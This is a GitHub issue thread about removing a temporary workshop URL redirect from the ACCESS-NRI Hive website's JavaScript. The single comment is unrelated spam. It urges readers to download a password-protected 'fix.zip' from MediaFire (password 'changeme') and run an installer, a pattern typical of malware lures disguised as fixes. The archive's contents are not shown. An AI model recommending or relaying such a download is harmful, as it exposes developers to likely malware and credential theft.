### ISSUE TITLE
AFTER_WORKSHOP: Remove redirection for first_steps

### ISSUE THREAD

**Issue by atteggiani** [ACCESS-NRI/access-hive.org.au#760]
## Description
There is a recently merged [urgent PR](https://github.com/ACCESS-NRI/access-hive.org.au/pull/759) that applies a URL redirection for the worskshop.

## Close Criteria
After the worskshop remove the redirection:

https://github.com/ACCESS-NRI/access-hive.org.au/blob/6fc90a3f4456a8c87bdfa3301639dc12d38d3152/docs/js/miscellaneous.js#L3C1-L12

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
